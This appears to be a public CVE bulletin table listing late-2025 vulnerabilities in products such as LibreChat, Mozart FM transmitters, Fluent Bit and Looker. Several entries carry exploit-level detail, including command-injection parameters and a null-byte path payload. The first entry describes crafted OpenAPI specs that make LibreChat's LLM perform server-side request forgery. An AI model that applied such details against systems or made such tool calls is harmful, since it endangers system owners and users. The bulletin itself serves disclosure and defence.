| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its "Actions" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2. | 2025-11-29 | not yet calculated | CVE-2025-66201 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-7m2q-fjwr-5x8v |
| Davantis--DFUSION | Inadequate access control vulnerability in Davantis DFUSION v6.177.7, which allows unauthorised actors to extract images and videos related to alarm events through access to "/alarms/<ALARM_ID>/<MEDIA>", where the "MEDIA" parameter can take the value of "snapshot" or "video.mp4". These media files contain images recorded by security cameras in response to triggered alerts. | 2025-11-24 | not yet calculated | CVE-2025-41016 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dfusion-davantis |
| Davantis--DFUSION | Inadequate access control vulnerability in Davantis DDFUSION v6.177.7, which allows unauthorised actors to retrieve perspective parameters from security camera settings by accessing "/cameras/<CAMERA_ID>/perspective". | 2025-11-24 | not yet calculated | CVE-2025-41017 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-dfusion-davantis |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (status_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Allows unauthenticated arbitrary file upload via /var/tdf/status_contents.php. | 2025-11-26 | not yet calculated | CVE-2025-66250 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Path Traversal with Arbitrary File Deletion in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deletehidden parameter allows path traversal deletion of arbitrary .tgz files. | 2025-11-26 | not yet calculated | CVE-2025-66251 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Infinite Loop Denial of Service via Failed File Deletion in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Infinite loop when unlink() fails in status_contents.php causing DoS. Due to the fact that the unlink operation is done in a while loop; if an immutable file is specified or otherwise a file in which the process has no permissions to delete; it would repeatedly attempt to do in a loop. | 2025-11-26 | not yet calculated | CVE-2025-66252 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated OS Command Injection (start_upgrade.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform User input passed directly to exec() allows remote code execution via start_upgrade.php. The `/var/tdf/start_upgrade.php` endpoint passes user-controlled `$_GET["filename"]` directly into `exec()` without sanitization or shell escaping. Attackers can inject arbitrary shell commands using metacharacters (`;`, `|`, etc.) to achieve remote code execution as the web server user (likely root). | 2025-11-26 | not yet calculated | CVE-2025-66253 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Deletion (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deleteupgrade parameter allows unauthenticated deletion of arbitrary files. The `deleteupgrade` parameter in `/var/www/upgrade_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/upload/` without any extension restriction or path sanitization, enabling attackers to remove critical system files. | 2025-11-26 | not yet calculated | CVE-2025-66254 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (upgrade_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Missing signature validation allows uploading malicious firmware packages. The firmware upgrade endpoint in `upgrade_contents.php` accepts arbitrary file uploads without validating file headers, cryptographic signatures, or enforcing .tgz format requirements, allowing malicious firmware injection. This endpoint also subsequently provides ways for arbitrary file uploads and subsequent remote code execution | 2025-11-26 | not yet calculated | CVE-2025-66255 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Upload (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Unrestricted file upload in patch_contents.php allows uploading malicious files. The `/var/tdf/patch_contents.php` endpoint allows unauthenticated arbitrary file uploads without file type validation, MIME checking, or size restrictions beyond 16MB, enabling attackers to upload malicious files. | 2025-11-26 | not yet calculated | CVE-2025-66256 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Deletion (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deletepatch parameter allows unauthenticated deletion of arbitrary files. The `deletepatch` parameter in `patch_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/patch/` directory without sanitization or access control checks. | 2025-11-26 | not yet calculated | CVE-2025-66257 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Stored Cross-Site Scripting via XML Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Stored XSS via crafted filenames injected into patchlist.xml. User-controlled filenames are directly concatenated into `patchlist.xml` without encoding, allowing injection of malicious JavaScript payloads via crafted filenames (e.g., `<img src=x onerror=alert()>.bin`). The XSS executes when ajax.js processes and renders the XML file. | 2025-11-26 | not yet calculated | CVE-2025-66258 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Authenticated Root Remote Code Execution via improrer user input filtering in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform in main_ok.php user supplied data/hour/time is passed directly into date shell command | 2025-11-26 | not yet calculated | CVE-2025-66259 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | PostgreSQL SQL Injection (status_sql.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform SQL injection via sw1 and sw2 parameters in status_sql.php. The `status_sql.php` endpoint constructs SQL UPDATE queries by directly concatenating user-controlled `sw1` and `sw2` parameters without using parameterized queries or `pg_escape_string()`. While PostgreSQL's `pg_exec` limitations prevent stacked queries, attackers can inject subqueries for data exfiltration and leverage verbose error messages for reconnaissance. | 2025-11-26 | not yet calculated | CVE-2025-66260 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated OS Command Injection (restore_settings.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform URL-decoded name parameter passed to exec() allows remote code execution. The `/var/tdf/restore_settings.php` endpoint passes user-controlled `$_GET["name"]` parameter through `urldecode()` directly into `exec()` without validation or escaping. Attackers can inject arbitrary shell commands using metacharacters (`;`, `|`, `&&`, etc.) to achieve unauthenticated remote code execution as the web server user. | 2025-11-26 | not yet calculated | CVE-2025-66261 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Arbitrary File Overwrite via Tar Extraction Path Traversal in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Tar extraction with -C / allow arbitrary file overwrite via crafted archive. The `restore_mozzi_memories.sh` script extracts user-controlled tar archives with `-C /` flag, depositing contents to the filesystem root without path validation. When combined with the unauthenticated file upload vulnerabilities (CVE-01, CVE-06, CVE-07), attackers can craft malicious .tgz archives containing path-traversed filenames (e.g., `etc/shadow`, `var/www/index.php`) to overwrite critical system files in writable directories, achieving full system compromise. | 2025-11-26 | not yet calculated | CVE-2025-66262 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| DB Electronica Telecomunicazioni S.p.A.--Mozart FM Transmitter | Unauthenticated Arbitrary File Read via Null Byte Injection in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Null byte injection in download_setting.php allows reading arbitrary files. The `/var/tdf/download_setting.php` endpoint constructs file paths by concatenating user-controlled `$_GET['filename']` with a forced `.tgz` extension. Running on PHP 5.3.2 (pre-5.3.4), the application is vulnerable to null byte injection (%00), allowing attackers to bypass the extension restriction and traverse paths. By requesting `filename=../../../../etc/passwd%00`, the underlying C functions treat the null byte as a string terminator, ignoring the appended `.tgz` and enabling unauthenticated arbitrary file disclosure of any file readable by the web server user. | 2025-11-26 | not yet calculated | CVE-2025-66263 | https://www.abdulmhsblog.com/posts/webfmvulns/ |
| Desktop Alert--desktopalert.net | An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to disclose user hashes. | 2025-11-24 | not yet calculated | CVE-2025-54338 | https://desktopalert.net/cve-2025-54338/ |
| Desktop Alert--desktopalert.net | A vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2. There are Hard-coded configuration values. | 2025-11-24 | not yet calculated | CVE-2025-54341 | https://desktopalert.net/cve-2025-54341/ |
| Desktop Alert--desktopalert.net | A Directory Traversal vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to write arbitrary files under certain conditions. | 2025-11-24 | not yet calculated | CVE-2025-54347 | https://desktopalert.net/cve-2025-54347/ |
| Desktop Alert--desktopalert.net | An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Incorrect Access Control, leading to Remote Information Disclosure. | 2025-11-24 | not yet calculated | CVE-2025-54563 | https://desktopalert.net/cve-2025-54563/ |
| Devolutions--Server | Exposure of credentials in unintended requests in Devolutions Server, Remote Desktop Manager on Windows.This issue affects Devolutions Server: through 2025.3.8.0; Remote Desktop Manager: through 2025.3.23.0. | 2025-11-28 | not yet calculated | CVE-2025-13683 | https://devolutions.net/security/advisories/DEVO-2025-0017/ |
| Devolutions--Server | SQL Injection vulnerability in last usage logs in Devolutions Server.This issue affects Devolutions Server: through 2025.2.20, through 2025.3.8. | 2025-11-27 | not yet calculated | CVE-2025-13757 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Devolutions--Server | Exposure of credentials in unintended requests in Devolutions Server.This issue affects Server: through 2025.2.20, through 2025.3.8. | 2025-11-27 | not yet calculated | CVE-2025-13758 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Devolutions--Server | Exposure of email service credentials to users without administrative rights in Devolutions Server.This issue affects Devolutions Server: before 2025.2.21, before 2025.3.9. | 2025-11-27 | not yet calculated | CVE-2025-13765 | https://devolutions.net/security/advisories/DEVO-2025-0018/ |
| Digital Bazaar--node-forge | An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions. | 2025-11-25 | not yet calculated | CVE-2025-12816 | https://www.npmjs.com/package/node-forge https://github.com/digitalbazaar/forge/pull/1124 https://github.com/digitalbazaar/forge CERT/CC Vulnerability Notice Github Security Advisory |
| digitalbazaar--forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Integer Overflow vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures containing OIDs with oversized arcs. These arcs may be decoded as smaller, trusted OIDs due to 32-bit bitwise truncation, enabling the bypass of downstream OID-based security decisions. This issue has been patched in version 1.3.2. | 2025-11-26 | not yet calculated | CVE-2025-66030 | https://github.com/digitalbazaar/forge/security/advisories/GHSA-65ch-62r8-g69g https://github.com/digitalbazaar/forge/commit/3e0c35ace169cfca529a3e547a7848dc7bf57fdb |
| digitalbazaar--forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. An Uncontrolled Recursion vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs. This issue has been patched in version 1.3.2. | 2025-11-26 | not yet calculated | CVE-2025-66031 | https://github.com/digitalbazaar/forge/security/advisories/GHSA-554w-wpv2-vw27 https://github.com/digitalbazaar/forge/commit/260425c6167a38aae038697132483b5517b26451 |
| Dongyoung Media Tech Co., Ltd.--DM-AP240T/W Wireless Access Point | Dongyoung Media DM-AP240T/W wireless access points contain an unauthenticated configuration disclosure vulnerability in the /cgi-bin/sys_system_config management endpoint. The endpoint allows remote retrieval of a compressed configuration archive without requiring authentication or authorization. The exposed configuration may include administrative credentials and other sensitive settings, enabling an unauthenticated attacker to obtain information that can facilitate further compromise of the device or network. | 2025-11-26 | not yet calculated | CVE-2019-25226 | https://packetstorm.news/files/id/154719/ https://cxsecurity.com/issue/WLB-2019100012 http://dongyoung.com/ https://www.vulncheck.com/advisories/dongyoung-media-dm-ap240tw-unauthenticated-config-disclosure |
| Drupal--Drupal | Webform Multiple File Upload module for Drupal 7.x contains a cross-site scripting (XSS) vulnerability in the file name renderer. An unauthenticated attacker can exploit this vulnerability by uploading a file with a malicious filename containing JavaScript code (e.g., "<img src=1 onerror=alert(document.domain)>") to a Webform node with a Multifile field where file type validation is disabled. This allows the execution of arbitrary scripts in the context of the victim's browser. The issue is present in a third-party library and has been addressed in a patch available at https://github.com/fyneworks/multifile/pull/44 . Users are advised to apply the provided patch or update to a fixed version of the module. | 2025-11-26 | not yet calculated | CVE-2025-12848 | https://www.drupal.org/node/3105204 |
| ESCAM--QD-900 WIFI HD Camera | ESCAM QD-900 WIFI HD cameras contain an unauthenticated configuration disclosure vulnerability in the /web/cgi-bin/hi3510/backup.cgi endpoint. The endpoint allows remote download of a compressed configuration backup without requiring authentication or authorization. The exposed backup can include administrative credentials and other sensitive device settings, enabling an unauthenticated remote attacker to obtain information that may facilitate further compromise of the camera or connected network. | 2025-11-26 | not yet calculated | CVE-2020-36871 | https://packetstorm.news/files/id/156492/ https://www.exploit-db.com/exploits/48107 https://www.vulncheck.com/advisories/escam-qd900-unauthenticated-config-disclosure |
| FAST FAC1200R--sezangel | FAST FAC1200R F400_FAC1200R_Q is vulnerable to Buffer Overflow in the function sub_80435780 via the parameter password. | 2025-11-26 | not yet calculated | CVE-2025-50399 | https://github.com/sezangel/IOT-vul/tree/main/FAST/FAC1200R/1 |
| FAST FAC1200R--sezangel | FAST FAC1200R F400_FAC1200R_Q is vulnerable to Buffer Overflow in the function sub_80435780 via the parameter string fac_password. | 2025-11-26 | not yet calculated | CVE-2025-50402 | https://github.com/sezangel/IOT-vul/tree/main/FAST/FAC1200R/2 |
| FluentBit--Fluent Bit | Fluent Bit in_forward input plugin does not properly enforce the security.users authentication mechanism under certain configuration conditions. This allows remote attackers with network access to the Fluent Bit instance exposing the forward input to send unauthenticated data. By bypassing authentication controls, attackers can inject forged log records, flood alerting systems, or manipulate routing decisions, compromising the authenticity and integrity of ingested logs. | 2025-11-24 | not yet calculated | CVE-2025-12969 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | The extract_name function in Fluent Bit in_docker input plugin copies container names into a fixed size stack buffer without validating length. An attacker who can create containers or control container names, can supply a long name that overflows the buffer, leading to process crash or arbitrary code execution. | 2025-11-24 | not yet calculated | CVE-2025-12970 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory. | 2025-11-24 | not yet calculated | CVE-2025-12972 | https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ |
| FluentBit--Fluent Bit | Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins fail to sanitize tag_key inputs. An attacker with network access or the ability to write records into Splunk or Elasticsearch can supply tag_key values containing special characters such as newlines or ../ that are treated as valid tags. Because tags influence routing and some outputs derive filenames or contents from tags, this can allow newline injection, path traversal, forged record injection, or log misrouting, impacting data integrity and log routing. | 2025-11-24 | not yet calculated | CVE-2025-12977 | https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/ https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover |
| FluentBit--Fluent Bit | Fluent Bit in_http, in_splunk, and in_elasticsearch input plugins contain a flaw in the tag_key validation logic that fails to enforce exact key-length matching. This allows crafted inputs where a tag prefix is incorrectly treated as a full match. A remote attacker with authenticated or exposed access to these input endpoints can exploit this behavior to manipulate tags and redirect records to unintended destinations. This compromises the authenticity of ingested logs and can allow injection of forged data, alert flooding and routing manipulation. | 2025-11-24 | not yet calculated | CVE-2025-12978 | https://fluentbit.io/announcements/v4.1.0/ |
| Frappe--Frappe CRM | Multiple SQL Injections in Frappe CRM Dashboard Controller due to unsafe concatenation of user-controlled parameters into dynamic SQL statements. This issue affects Frappe CRM: 1.53.1. | 2025-11-26 | not yet calculated | CVE-2025-11461 | https://fluidattacks.com/advisories/oz https://github.com/frappe/crm https://github.com/frappe/crm/pull/1339 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via crafted POST request to the Npcf_BDTPolicyControl API. | 2025-11-24 | not yet calculated | CVE-2025-60632 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/705 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via the Nudm_SubscriberDataManagement API. | 2025-11-24 | not yet calculated | CVE-2025-60633 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/702 https://github.com/free5gc/free5gc/issues/700 https://github.com/free5gc/free5gc/issues/701 https://github.com/free5gc/free5gc/issues/703 |
| Free5gc v4.0.0--OpenWall | An issue was discovered in Free5GC v4.0.0 and v4.0.1 allowing an attacker to cause a denial of service via crafted POST request to the Nnssf_NSSAIAvailability API. | 2025-11-24 | not yet calculated | CVE-2025-60638 | https://github.com/free5gc/free5gc https://github.com/free5gc/free5gc/issues/704 |
| Fuji Television Network, Inc.--"FOD" App for Android | "FOD" App uses hard-coded cryptographic keys, which may allow a local unauthenticated attacker to retrieve the cryptographic keys. | 2025-11-25 | not yet calculated | CVE-2025-64304 | https://help.fod.fujitv.co.jp/hc/ja/articles/48337068747033 https://jvn.jp/en/jp/JVN63368617/ |
| getsentry--sentry-javascript | Sentry-Javascript is an official Sentry SDKs for JavaScript. From version 10.11.0 to before 10.27.0, when a Node.js application using the Sentry SDK has sendDefaultPii: true it is possible to inadvertently send certain sensitive HTTP headers, including the Cookie header, to Sentry. Those headers would be stored within a Sentry organization as part of the associated trace. A person with access to the Sentry organization could then view and use these sensitive values to impersonate or escalate their privileges within the application. This issue has been patched in version 10.27.0. | 2025-11-25 | not yet calculated | CVE-2025-65944 | https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-6465-jgvq-jhgp https://github.com/getsentry/sentry-javascript/pull/17475 https://github.com/getsentry/sentry-javascript/commit/a820fa2891fdcf985b834a5b557edf351ec54539 https://github.com/getsentry/sentry-javascript/releases/tag/10.11.0 |
| Google Cloud--Looker | An attacker with viewer permissions in Looker could craft a malicious URL that, when opened by a Looker admin, would execute an attacker-supplied script. Exploitation required at least one Looker extension installed on the instance. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.18.201+ * 25.0.79+ * 25.6.66+ * 25.12.7+ * 25.16.0+ * 25.18.0+ * 25.20.0+ | 2025-11-24 | not yet calculated | CVE-2025-12739 | https://cloud.google.com/support/bulletins#gcp-2025-068 |
| Google Cloud--Looker | A Looker user with a Developer role could create a database connection using IBM DB2 driver and, by manipulating LookML, cause Looker to execute a malicious command, due to inadequate filtering of the driver's parameters. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 25.0.93+ * 25.6.84+ * 25.12.42+ * 25.14.50+ * 25.16.44+ | 2025-11-24 | not yet calculated | CVE-2025-12740 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| Google Cloud--Looker | A Looker user with Developer role could create a database connection using Denodo driver and, by manipulating LookML, cause Looker to execute a malicious command. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.108+ * 24.18.200+ * 25.0.78+ * 25.6.65+ * 25.8.47+ * 25.12.10+ * 25.14+ | 2025-11-24 | not yet calculated | CVE-2025-12741 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| Google Cloud--Looker | A Looker user with a Developer role could cause Looker to execute a malicious command, due to insecure processing of Teradata driver parameters. Looker-hosted and Self-hosted were found to be vulnerable. This issue has already been mitigated for Looker-hosted instances. No user action is required for these. Self-hosted instances must be upgraded as soon as possible. This vulnerability has been patched in all supported versions of Self-hosted. The versions below have all been updated to protect from this vulnerability. You can download these versions at the Looker download page https://download.looker.com/ : * 24.12.108+ * 24.18.200+ * 25.0.78+ * 25.6.65+ * 25.8.47+ * 25.12.10+ * 25.14+ | 2025-11-25 | not yet calculated | CVE-2025-12742 | https://cloud.google.com/support/bulletins#gcp-2025-052 |
| GroceryMart--GroceryMart | An issue was discovered in file users.json in GroceryMart commit 21934e6 (2020-10-23) allowing unauthenticated attackers to gain sensitive information including plaintext usernames and passwords. | 2025-11-26 | not yet calculated | CVE-2025-65278 | https://gist.github.com/whoisrushi/7e8d15c85221e3f708b7b480e04ab6ca |
| HCL Technologies--HLC | Cross-Site Request Forgery (CSRF) vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51733 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | Cross-site scripting (XSS) vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51734 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | CSV formula injection vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51735 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| HCL Technologies--HLC | File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0. | 2025-11-28 | not yet calculated | CVE-2025-51736 | https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 |
| iiDk-the-actual--Console | Console is a network used to control Gorilla Tag mods' users and other users on the network. Prior to version 2.8.0, a path traversal vulnerability exists where complicated combinations of backslashes and periods can be used to escape the Gorilla Tag path and write to unwanted directories. This issue has been patched in version 2.8.0. | 2025-11-25 | not yet calculated | CVE-2025-65952 | https://github.com/iiDk-the-actual/Console/security/advisories/GHSA-c3f7-xh45-2xc7 https://github.com/iiDk-the-actual/Console/commit/4bcb1cf23ef78f8e6899dd6fe3afa3b24902e458 https://github.com/iiDk-the-actual/Console/commit/e1005b8754594ad463ae58f8a99decda548b1826 |
| ilevia EVE X1--iSee857 | Cross Site Request Forgery (CSRF) vulnerability in Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before, Logic Version v6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /bh_web_backend component | 2025-11-25 | not yet calculated | CVE-2025-60739 | https://github.com/iSee857/ilevia-EVE-X1-Server-CSRF |
| immonit.com--Monnit | An issue was discovered in imonnit.com (2025-04-24) allowing malicious actors to gain escalated privileges via crafted password reset to take over arbitrary user accounts. | 2025-11-26 | not yet calculated | CVE-2025-50433 | http://imonnitcom.com http://monnit.com https://youtu.be/-BqcdwHgMMA https://github.com/0xMandor/imonnit-ato-advisory/blob/main/CVE-2025-50433.md |
| Intercom, Inc.--Security Point (Windows) of MaLion | Incorrect default permissions issue exists in Security Point (Windows) of MaLion prior to Ver.5.3.4. If this vulnerability is exploited, an arbitrary file could be placed in the specific folder by a user who can log in to the system where the product's Windows client is installed. If the file is a specially crafted DLL file, arbitrary code could be executed with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-59485 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercom, Inc.--Security Point (Windows) of MaLion | Security Point (Windows) of MaLion and MaLionCloud contains a stack-based buffer overflow vulnerability in processing HTTP headers. Receiving a specially crafted request from a remote unauthenticated attacker could lead to arbitrary code execution with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-62691 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercom, Inc.--Security Point (Windows) of MaLion | Security Point (Windows) of MaLion and MaLionCloud contains a heap-based buffer overflow vulnerability in processing Content-Length. Receiving a specially crafted request from a remote unauthenticated attacker could lead to arbitrary code execution with SYSTEM privilege. | 2025-11-25 | not yet calculated | CVE-2025-64693 | https://www.intercom.co.jp/information/2025/1125.html https://jvn.jp/en/jp/JVN76298784/ |
| Intercore-Productions--Core-Bot | Core Bot Is an Open Source discord bot made for maple hospital servers. Prior to commit dffe050, the API keys (SUPABASE_API_KEY, TOKEN) are loaded using environment variables, but there are cases in code (error handling, summaries, webhooks) where configuration summaries may inadvertently leak sensitive data (e.g., by failing to redact data in summary embeds or logs). This issue has been patched via commit dffe050. | 2025-11-25 | not yet calculated | CVE-2025-65957 | https://github.com/Intercore-Productions/Core-Bot/security/advisories/GHSA-42j6-x28v-38r8 https://github.com/Intercore-Productions/Core-Bot/commit/dffe050d565a580edfcd0242efa45da88ab31260 |
| JAVA-Oracle | Out-of-bounds memory operations in org.lz4:lz4-java 1.8.0 and earlier allow remote attackers to cause denial of service and read adjacent memory via untrusted compressed input. | 2025-11-28 | not yet calculated | CVE-2025-12183 | https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-12183 https://github.com/yawkat/lz4-java/releases/tag/v1.8.1 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads. | 2025-11-25 | not yet calculated | CVE-2025-51742 | https://gitee.com/jishenghua/JSH_ERP https://blog.hackpax.top/jsh-erp/ https://gitee.com/jishenghua https://gist.github.com/Paxsizy/a40334ffa7f05c42bf0348833f830108 |
| jishenghua JSH_ERP 2.3.1--Paxsizy | An issue was discovered in jishenghua JSH_ERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks. | 2025-11-25 | not yet calculated | CVE-2025-51743 | https://gitee.com/jishenghua/JSH_ERP https://gitee.com/jishenghua https://blog.hackpax.top/jsh-erp2/ https://gist.github.com/Paxsizy/cd1557aeba8093a8650601c4dbffb6f9 |
